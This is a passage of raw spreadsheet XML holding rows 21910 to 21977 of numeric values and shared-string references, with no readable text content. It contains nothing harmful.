        <v>4.5628295E7</v>
      </c>
      <c r="C21910" s="2" t="s">
        <v>21157</v>
      </c>
      <c r="D21910" s="2">
        <v>1.0</v>
      </c>
      <c r="E21910" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21910" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21911" ht="15.75" customHeight="1">
      <c r="A21911" s="1">
        <v>16269.0</v>
      </c>
      <c r="B21911" s="2">
        <v>4.5780537E7</v>
      </c>
      <c r="C21911" s="2" t="s">
        <v>21158</v>
      </c>
      <c r="D21911" s="2">
        <v>1.0</v>
      </c>
      <c r="E21911" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21911" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21912" ht="15.75" customHeight="1">
      <c r="A21912" s="1">
        <v>16331.0</v>
      </c>
      <c r="B21912" s="2">
        <v>4.6006414E7</v>
      </c>
      <c r="C21912" s="2" t="s">
        <v>21159</v>
      </c>
      <c r="D21912" s="2">
        <v>1.0</v>
      </c>
      <c r="E21912" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21912" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21913" ht="15.75" customHeight="1">
      <c r="A21913" s="1">
        <v>16384.0</v>
      </c>
      <c r="B21913" s="2">
        <v>4622675.0</v>
      </c>
      <c r="C21913" s="2" t="s">
        <v>21160</v>
      </c>
      <c r="D21913" s="2">
        <v>1.0</v>
      </c>
      <c r="E21913" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21913" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21914" ht="15.75" customHeight="1">
      <c r="A21914" s="1">
        <v>16531.0</v>
      </c>
      <c r="B21914" s="2">
        <v>4.6710179E7</v>
      </c>
      <c r="C21914" s="2" t="s">
        <v>21161</v>
      </c>
      <c r="D21914" s="2">
        <v>1.0</v>
      </c>
      <c r="E21914" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21914" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21915" ht="15.75" customHeight="1">
      <c r="A21915" s="1">
        <v>16535.0</v>
      </c>
      <c r="B21915" s="2">
        <v>4.6749602E7</v>
      </c>
      <c r="C21915" s="2" t="s">
        <v>21162</v>
      </c>
      <c r="D21915" s="2">
        <v>1.0</v>
      </c>
      <c r="E21915" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21915" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21916" ht="15.75" customHeight="1">
      <c r="A21916" s="1">
        <v>16835.0</v>
      </c>
      <c r="B21916" s="2">
        <v>4.7898289E7</v>
      </c>
      <c r="C21916" s="2" t="s">
        <v>21163</v>
      </c>
      <c r="D21916" s="2">
        <v>1.0</v>
      </c>
      <c r="E21916" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21916" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21917" ht="15.75" customHeight="1">
      <c r="A21917" s="1">
        <v>17316.0</v>
      </c>
      <c r="B21917" s="2">
        <v>4.933269E7</v>
      </c>
      <c r="C21917" s="2" t="s">
        <v>21164</v>
      </c>
      <c r="D21917" s="2">
        <v>1.0</v>
      </c>
      <c r="E21917" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21917" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21918" ht="15.75" customHeight="1">
      <c r="A21918" s="1">
        <v>17461.0</v>
      </c>
      <c r="B21918" s="2">
        <v>4.9846401E7</v>
      </c>
      <c r="C21918" s="2" t="s">
        <v>21165</v>
      </c>
      <c r="D21918" s="2">
        <v>1.0</v>
      </c>
      <c r="E21918" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21918" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21919" ht="15.75" customHeight="1">
      <c r="A21919" s="1">
        <v>17523.0</v>
      </c>
      <c r="B21919" s="2">
        <v>5.0092927E7</v>
      </c>
      <c r="C21919" s="2" t="s">
        <v>21166</v>
      </c>
      <c r="D21919" s="2">
        <v>1.0</v>
      </c>
      <c r="E21919" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21919" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21920" ht="15.75" customHeight="1">
      <c r="A21920" s="1">
        <v>17606.0</v>
      </c>
      <c r="B21920" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C21920" s="2" t="s">
        <v>21167</v>
      </c>
      <c r="D21920" s="2">
        <v>1.0</v>
      </c>
      <c r="E21920" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21920" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21921" ht="15.75" customHeight="1">
      <c r="A21921" s="1">
        <v>17843.0</v>
      </c>
      <c r="B21921" s="2">
        <v>5.0949848E7</v>
      </c>
      <c r="C21921" s="2" t="s">
        <v>21168</v>
      </c>
      <c r="D21921" s="2">
        <v>1.0</v>
      </c>
      <c r="E21921" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21921" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21922" ht="15.75" customHeight="1">
      <c r="A21922" s="1">
        <v>17960.0</v>
      </c>
      <c r="B21922" s="2">
        <v>5.1296488E7</v>
      </c>
      <c r="C21922" s="2" t="s">
        <v>21169</v>
      </c>
      <c r="D21922" s="2">
        <v>1.0</v>
      </c>
      <c r="E21922" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21922" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21923" ht="15.75" customHeight="1">
      <c r="A21923" s="1">
        <v>18147.0</v>
      </c>
      <c r="B21923" s="2">
        <v>5.1855386E7</v>
      </c>
      <c r="C21923" s="2" t="s">
        <v>21170</v>
      </c>
      <c r="D21923" s="2">
        <v>1.0</v>
      </c>
      <c r="E21923" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21923" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21924" ht="15.75" customHeight="1">
      <c r="A21924" s="1">
        <v>18406.0</v>
      </c>
      <c r="B21924" s="2">
        <v>5.263921E7</v>
      </c>
      <c r="C21924" s="2" t="s">
        <v>21171</v>
      </c>
      <c r="D21924" s="2">
        <v>1.0</v>
      </c>
      <c r="E21924" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21924" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21925" ht="15.75" customHeight="1">
      <c r="A21925" s="1">
        <v>18461.0</v>
      </c>
      <c r="B21925" s="2">
        <v>5.2830591E7</v>
      </c>
      <c r="C21925" s="2" t="s">
        <v>21172</v>
      </c>
      <c r="D21925" s="2">
        <v>1.0</v>
      </c>
      <c r="E21925" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21925" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21926" ht="15.75" customHeight="1">
      <c r="A21926" s="1">
        <v>18679.0</v>
      </c>
      <c r="B21926" s="2">
        <v>5.3569131E7</v>
      </c>
      <c r="C21926" s="2" t="s">
        <v>21173</v>
      </c>
      <c r="D21926" s="2">
        <v>1.0</v>
      </c>
      <c r="E21926" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21926" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21927" ht="15.75" customHeight="1">
      <c r="A21927" s="1">
        <v>18785.0</v>
      </c>
      <c r="B21927" s="2">
        <v>5.3826992E7</v>
      </c>
      <c r="C21927" s="2" t="s">
        <v>21174</v>
      </c>
      <c r="D21927" s="2">
        <v>1.0</v>
      </c>
      <c r="E21927" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21927" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21928" ht="15.75" customHeight="1">
      <c r="A21928" s="1">
        <v>18809.0</v>
      </c>
      <c r="B21928" s="2">
        <v>5.3889957E7</v>
      </c>
      <c r="C21928" s="2" t="s">
        <v>21175</v>
      </c>
      <c r="D21928" s="2">
        <v>1.0</v>
      </c>
      <c r="E21928" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21928" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21929" ht="15.75" customHeight="1">
      <c r="A21929" s="1">
        <v>18918.0</v>
      </c>
      <c r="B21929" s="2">
        <v>5.4209321E7</v>
      </c>
      <c r="C21929" s="2" t="s">
        <v>21176</v>
      </c>
      <c r="D21929" s="2">
        <v>1.0</v>
      </c>
      <c r="E21929" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21929" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21930" ht="15.75" customHeight="1">
      <c r="A21930" s="1">
        <v>19376.0</v>
      </c>
      <c r="B21930" s="2">
        <v>5.5490216E7</v>
      </c>
      <c r="C21930" s="2" t="s">
        <v>21177</v>
      </c>
      <c r="D21930" s="2">
        <v>1.0</v>
      </c>
      <c r="E21930" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21930" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21931" ht="15.75" customHeight="1">
      <c r="A21931" s="1">
        <v>19425.0</v>
      </c>
      <c r="B21931" s="2">
        <v>5.5666562E7</v>
      </c>
      <c r="C21931" s="2" t="s">
        <v>21178</v>
      </c>
      <c r="D21931" s="2">
        <v>1.0</v>
      </c>
      <c r="E21931" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21931" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21932" ht="15.75" customHeight="1">
      <c r="A21932" s="1">
        <v>19590.0</v>
      </c>
      <c r="B21932" s="2">
        <v>5.6161343E7</v>
      </c>
      <c r="C21932" s="2" t="s">
        <v>21179</v>
      </c>
      <c r="D21932" s="2">
        <v>1.0</v>
      </c>
      <c r="E21932" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21932" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21933" ht="15.75" customHeight="1">
      <c r="A21933" s="1">
        <v>19667.0</v>
      </c>
      <c r="B21933" s="2">
        <v>5.636915E7</v>
      </c>
      <c r="C21933" s="2" t="s">
        <v>21180</v>
      </c>
      <c r="D21933" s="2">
        <v>1.0</v>
      </c>
      <c r="E21933" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21933" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21934" ht="15.75" customHeight="1">
      <c r="A21934" s="1">
        <v>19908.0</v>
      </c>
      <c r="B21934" s="2">
        <v>5.7345595E7</v>
      </c>
      <c r="C21934" s="2" t="s">
        <v>21181</v>
      </c>
      <c r="D21934" s="2">
        <v>1.0</v>
      </c>
      <c r="E21934" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21934" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21935" ht="15.75" customHeight="1">
      <c r="A21935" s="1">
        <v>20055.0</v>
      </c>
      <c r="B21935" s="2">
        <v>8181351.0</v>
      </c>
      <c r="C21935" s="2" t="s">
        <v>21182</v>
      </c>
      <c r="D21935" s="2">
        <v>1.0</v>
      </c>
      <c r="E21935" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21935" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21936" ht="15.75" customHeight="1">
      <c r="A21936" s="1">
        <v>21075.0</v>
      </c>
      <c r="B21936" s="2">
        <v>1.7984156E7</v>
      </c>
      <c r="C21936" s="2" t="s">
        <v>21183</v>
      </c>
      <c r="D21936" s="2">
        <v>1.0</v>
      </c>
      <c r="E21936" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21936" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21937" ht="15.75" customHeight="1">
      <c r="A21937" s="1">
        <v>21365.0</v>
      </c>
      <c r="B21937" s="2">
        <v>2.146154E7</v>
      </c>
      <c r="C21937" s="2" t="s">
        <v>21184</v>
      </c>
      <c r="D21937" s="2">
        <v>1.0</v>
      </c>
      <c r="E21937" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21937" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21938" ht="15.75" customHeight="1">
      <c r="A21938" s="1">
        <v>22131.0</v>
      </c>
      <c r="B21938" s="2">
        <v>3.1076029E7</v>
      </c>
      <c r="C21938" s="2" t="s">
        <v>21185</v>
      </c>
      <c r="D21938" s="2">
        <v>1.0</v>
      </c>
      <c r="E21938" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21938" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21939" ht="15.75" customHeight="1">
      <c r="A21939" s="1">
        <v>22370.0</v>
      </c>
      <c r="B21939" s="2">
        <v>3.4993308E7</v>
      </c>
      <c r="C21939" s="2" t="s">
        <v>21186</v>
      </c>
      <c r="D21939" s="2">
        <v>1.0</v>
      </c>
      <c r="E21939" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21939" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21940" ht="15.75" customHeight="1">
      <c r="A21940" s="1">
        <v>22390.0</v>
      </c>
      <c r="B21940" s="2">
        <v>3.5379866E7</v>
      </c>
      <c r="C21940" s="2" t="s">
        <v>21187</v>
      </c>
      <c r="D21940" s="2">
        <v>1.0</v>
      </c>
      <c r="E21940" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21940" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21941" ht="15.75" customHeight="1">
      <c r="A21941" s="1">
        <v>22428.0</v>
      </c>
      <c r="B21941" s="2">
        <v>3.6165805E7</v>
      </c>
      <c r="C21941" s="2" t="s">
        <v>21188</v>
      </c>
      <c r="D21941" s="2">
        <v>1.0</v>
      </c>
      <c r="E21941" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21941" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21942" ht="15.75" customHeight="1">
      <c r="A21942" s="1">
        <v>22658.0</v>
      </c>
      <c r="B21942" s="2">
        <v>4.116275E7</v>
      </c>
      <c r="C21942" s="2" t="s">
        <v>21189</v>
      </c>
      <c r="D21942" s="2">
        <v>1.0</v>
      </c>
      <c r="E21942" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21942" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21943" ht="15.75" customHeight="1">
      <c r="A21943" s="1">
        <v>22971.0</v>
      </c>
      <c r="B21943" s="2">
        <v>4.9241795E7</v>
      </c>
      <c r="C21943" s="2" t="s">
        <v>21190</v>
      </c>
      <c r="D21943" s="2">
        <v>1.0</v>
      </c>
      <c r="E21943" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21943" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21944" ht="15.75" customHeight="1">
      <c r="A21944" s="1">
        <v>23738.0</v>
      </c>
      <c r="B21944" s="2">
        <v>7331696.0</v>
      </c>
      <c r="C21944" s="2" t="s">
        <v>21191</v>
      </c>
      <c r="D21944" s="2">
        <v>1.0</v>
      </c>
      <c r="E21944" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21944" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21945" ht="15.75" customHeight="1">
      <c r="A21945" s="1">
        <v>24262.0</v>
      </c>
      <c r="B21945" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C21945" s="2" t="s">
        <v>21192</v>
      </c>
      <c r="D21945" s="2">
        <v>1.0</v>
      </c>
      <c r="E21945" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21945" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21946" ht="15.75" customHeight="1">
      <c r="A21946" s="1">
        <v>24495.0</v>
      </c>
      <c r="B21946" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C21946" s="2" t="s">
        <v>21193</v>
      </c>
      <c r="D21946" s="2">
        <v>1.0</v>
      </c>
      <c r="E21946" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21946" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21947" ht="15.75" customHeight="1">
      <c r="A21947" s="1">
        <v>24596.0</v>
      </c>
      <c r="B21947" s="2">
        <v>1.1395534E7</v>
      </c>
      <c r="C21947" s="2" t="s">
        <v>21194</v>
      </c>
      <c r="D21947" s="2">
        <v>1.0</v>
      </c>
      <c r="E21947" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21947" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21948" ht="15.75" customHeight="1">
      <c r="A21948" s="1">
        <v>24637.0</v>
      </c>
      <c r="B21948" s="2">
        <v>1.1478667E7</v>
      </c>
      <c r="C21948" s="2" t="s">
        <v>21195</v>
      </c>
      <c r="D21948" s="2">
        <v>1.0</v>
      </c>
      <c r="E21948" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21948" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21949" ht="15.75" customHeight="1">
      <c r="A21949" s="1">
        <v>25560.0</v>
      </c>
      <c r="B21949" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C21949" s="2" t="s">
        <v>21196</v>
      </c>
      <c r="D21949" s="2">
        <v>1.0</v>
      </c>
      <c r="E21949" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21949" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21950" ht="15.75" customHeight="1">
      <c r="A21950" s="1">
        <v>26597.0</v>
      </c>
      <c r="B21950" s="2">
        <v>1.7984155E7</v>
      </c>
      <c r="C21950" s="2" t="s">
        <v>21183</v>
      </c>
      <c r="D21950" s="2">
        <v>1.0</v>
      </c>
      <c r="E21950" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21950" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21951" ht="15.75" customHeight="1">
      <c r="A21951" s="1">
        <v>26789.0</v>
      </c>
      <c r="B21951" s="2">
        <v>1.8569745E7</v>
      </c>
      <c r="C21951" s="2" t="s">
        <v>21197</v>
      </c>
      <c r="D21951" s="2">
        <v>1.0</v>
      </c>
      <c r="E21951" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21951" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21952" ht="15.75" customHeight="1">
      <c r="A21952" s="1">
        <v>27346.0</v>
      </c>
      <c r="B21952" s="2">
        <v>2.1461539E7</v>
      </c>
      <c r="C21952" s="2" t="s">
        <v>21184</v>
      </c>
      <c r="D21952" s="2">
        <v>1.0</v>
      </c>
      <c r="E21952" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21952" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21953" ht="15.75" customHeight="1">
      <c r="A21953" s="1">
        <v>27524.0</v>
      </c>
      <c r="B21953" s="2">
        <v>2.2168174E7</v>
      </c>
      <c r="C21953" s="2" t="s">
        <v>21198</v>
      </c>
      <c r="D21953" s="2">
        <v>1.0</v>
      </c>
      <c r="E21953" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21953" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21954" ht="15.75" customHeight="1">
      <c r="A21954" s="1">
        <v>27550.0</v>
      </c>
      <c r="B21954" s="2">
        <v>2.2341574E7</v>
      </c>
      <c r="C21954" s="2" t="s">
        <v>21199</v>
      </c>
      <c r="D21954" s="2">
        <v>1.0</v>
      </c>
      <c r="E21954" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21954" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21955" ht="15.75" customHeight="1">
      <c r="A21955" s="1">
        <v>27669.0</v>
      </c>
      <c r="B21955" s="2">
        <v>2.2924248E7</v>
      </c>
      <c r="C21955" s="2" t="s">
        <v>21200</v>
      </c>
      <c r="D21955" s="2">
        <v>1.0</v>
      </c>
      <c r="E21955" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21955" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21956" ht="15.75" customHeight="1">
      <c r="A21956" s="1">
        <v>28412.0</v>
      </c>
      <c r="B21956" s="2">
        <v>2.6359515E7</v>
      </c>
      <c r="C21956" s="2" t="s">
        <v>21201</v>
      </c>
      <c r="D21956" s="2">
        <v>1.0</v>
      </c>
      <c r="E21956" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21956" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21957" ht="15.75" customHeight="1">
      <c r="A21957" s="1">
        <v>28439.0</v>
      </c>
      <c r="B21957" s="2">
        <v>2.6516283E7</v>
      </c>
      <c r="C21957" s="2" t="s">
        <v>21202</v>
      </c>
      <c r="D21957" s="2">
        <v>1.0</v>
      </c>
      <c r="E21957" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21957" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21958" ht="15.75" customHeight="1">
      <c r="A21958" s="1">
        <v>28576.0</v>
      </c>
      <c r="B21958" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C21958" s="2" t="s">
        <v>21203</v>
      </c>
      <c r="D21958" s="2">
        <v>1.0</v>
      </c>
      <c r="E21958" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21958" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21959" ht="15.75" customHeight="1">
      <c r="A21959" s="1">
        <v>28600.0</v>
      </c>
      <c r="B21959" s="2">
        <v>2.707231E7</v>
      </c>
      <c r="C21959" s="2" t="s">
        <v>21204</v>
      </c>
      <c r="D21959" s="2">
        <v>1.0</v>
      </c>
      <c r="E21959" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21959" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21960" ht="15.75" customHeight="1">
      <c r="A21960" s="1">
        <v>28696.0</v>
      </c>
      <c r="B21960" s="2">
        <v>2.771919E7</v>
      </c>
      <c r="C21960" s="2" t="s">
        <v>21205</v>
      </c>
      <c r="D21960" s="2">
        <v>1.0</v>
      </c>
      <c r="E21960" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21960" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21961" ht="15.75" customHeight="1">
      <c r="A21961" s="1">
        <v>28697.0</v>
      </c>
      <c r="B21961" s="2">
        <v>2.7719278E7</v>
      </c>
      <c r="C21961" s="2" t="s">
        <v>21205</v>
      </c>
      <c r="D21961" s="2">
        <v>1.0</v>
      </c>
      <c r="E21961" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21961" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21962" ht="15.75" customHeight="1">
      <c r="A21962" s="1">
        <v>28698.0</v>
      </c>
      <c r="B21962" s="2">
        <v>2.7721005E7</v>
      </c>
      <c r="C21962" s="2" t="s">
        <v>21205</v>
      </c>
      <c r="D21962" s="2">
        <v>1.0</v>
      </c>
      <c r="E21962" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21962" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21963" ht="15.75" customHeight="1">
      <c r="A21963" s="1">
        <v>29347.0</v>
      </c>
      <c r="B21963" s="2">
        <v>3.1505631E7</v>
      </c>
      <c r="C21963" s="2" t="s">
        <v>21206</v>
      </c>
      <c r="D21963" s="2">
        <v>1.0</v>
      </c>
      <c r="E21963" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21963" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21964" ht="15.75" customHeight="1">
      <c r="A21964" s="1">
        <v>29893.0</v>
      </c>
      <c r="B21964" s="2">
        <v>3607013.0</v>
      </c>
      <c r="C21964" s="2" t="s">
        <v>21207</v>
      </c>
      <c r="D21964" s="2">
        <v>1.0</v>
      </c>
      <c r="E21964" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21964" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21965" ht="15.75" customHeight="1">
      <c r="A21965" s="1">
        <v>29986.0</v>
      </c>
      <c r="B21965" s="2">
        <v>3.6107381E7</v>
      </c>
      <c r="C21965" s="2" t="s">
        <v>21208</v>
      </c>
      <c r="D21965" s="2">
        <v>1.0</v>
      </c>
      <c r="E21965" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21965" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21966" ht="15.75" customHeight="1">
      <c r="A21966" s="1">
        <v>31178.0</v>
      </c>
      <c r="B21966" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C21966" s="2" t="s">
        <v>21209</v>
      </c>
      <c r="D21966" s="2">
        <v>1.0</v>
      </c>
      <c r="E21966" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21966" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21967" ht="15.75" customHeight="1">
      <c r="A21967" s="1">
        <v>33072.0</v>
      </c>
      <c r="B21967" s="2">
        <v>6874736.0</v>
      </c>
      <c r="C21967" s="2" t="s">
        <v>21210</v>
      </c>
      <c r="D21967" s="2">
        <v>1.0</v>
      </c>
      <c r="E21967" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21967" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21968" ht="15.75" customHeight="1">
      <c r="A21968" s="1">
        <v>33121.0</v>
      </c>
      <c r="B21968" s="2">
        <v>7000890.0</v>
      </c>
      <c r="C21968" s="2" t="s">
        <v>21211</v>
      </c>
      <c r="D21968" s="2">
        <v>1.0</v>
      </c>
      <c r="E21968" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21968" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21969" ht="15.75" customHeight="1">
      <c r="A21969" s="1">
        <v>33781.0</v>
      </c>
      <c r="B21969" s="2">
        <v>8723499.0</v>
      </c>
      <c r="C21969" s="2" t="s">
        <v>21212</v>
      </c>
      <c r="D21969" s="2">
        <v>1.0</v>
      </c>
      <c r="E21969" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21969" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21970" ht="15.75" customHeight="1">
      <c r="A21970" s="1">
        <v>33993.0</v>
      </c>
      <c r="B21970" s="2">
        <v>9424168.0</v>
      </c>
      <c r="C21970" s="2" t="s">
        <v>21213</v>
      </c>
      <c r="D21970" s="2">
        <v>1.0</v>
      </c>
      <c r="E21970" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21970" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21971" ht="15.75" customHeight="1">
      <c r="A21971" s="1">
        <v>35.0</v>
      </c>
      <c r="B21971" s="2">
        <v>1.0549628E7</v>
      </c>
      <c r="C21971" s="2" t="s">
        <v>21214</v>
      </c>
      <c r="D21971" s="2">
        <v>1.0</v>
      </c>
      <c r="E21971" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21971" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21972" ht="15.75" customHeight="1">
      <c r="A21972" s="1">
        <v>540.0</v>
      </c>
      <c r="B21972" s="2">
        <v>1.8673426E7</v>
      </c>
      <c r="C21972" s="2" t="s">
        <v>21215</v>
      </c>
      <c r="D21972" s="2">
        <v>1.0</v>
      </c>
      <c r="E21972" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21972" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21973" ht="15.75" customHeight="1">
      <c r="A21973" s="1">
        <v>1105.0</v>
      </c>
      <c r="B21973" s="2">
        <v>2.3990883E7</v>
      </c>
      <c r="C21973" s="2" t="s">
        <v>21216</v>
      </c>
      <c r="D21973" s="2">
        <v>1.0</v>
      </c>
      <c r="E21973" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21973" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21974" ht="15.75" customHeight="1">
      <c r="A21974" s="1">
        <v>1135.0</v>
      </c>
      <c r="B21974" s="2">
        <v>2.4209334E7</v>
      </c>
      <c r="C21974" s="2" t="s">
        <v>21217</v>
      </c>
      <c r="D21974" s="2">
        <v>1.0</v>
      </c>
      <c r="E21974" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21974" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21975" ht="15.75" customHeight="1">
      <c r="A21975" s="1">
        <v>1401.0</v>
      </c>
      <c r="B21975" s="2">
        <v>2.6294738E7</v>
      </c>
      <c r="C21975" s="2" t="s">
        <v>21218</v>
      </c>
      <c r="D21975" s="2">
        <v>1.0</v>
      </c>
      <c r="E21975" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21975" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21976" ht="15.75" customHeight="1">
      <c r="A21976" s="1">
        <v>1408.0</v>
      </c>
      <c r="B21976" s="2">
        <v>2.6331858E7</v>
      </c>
      <c r="C21976" s="2" t="s">
        <v>21219</v>
      </c>
      <c r="D21976" s="2">
        <v>1.0</v>
      </c>
      <c r="E21976" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21976" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21977" ht="15.75" customHeight="1">
      <c r="A21977" s="1">
        <v>1579.0</v>
      </c>
      <c r="B21977" s="2">
        <v>2.7730877E7</v>
      </c>
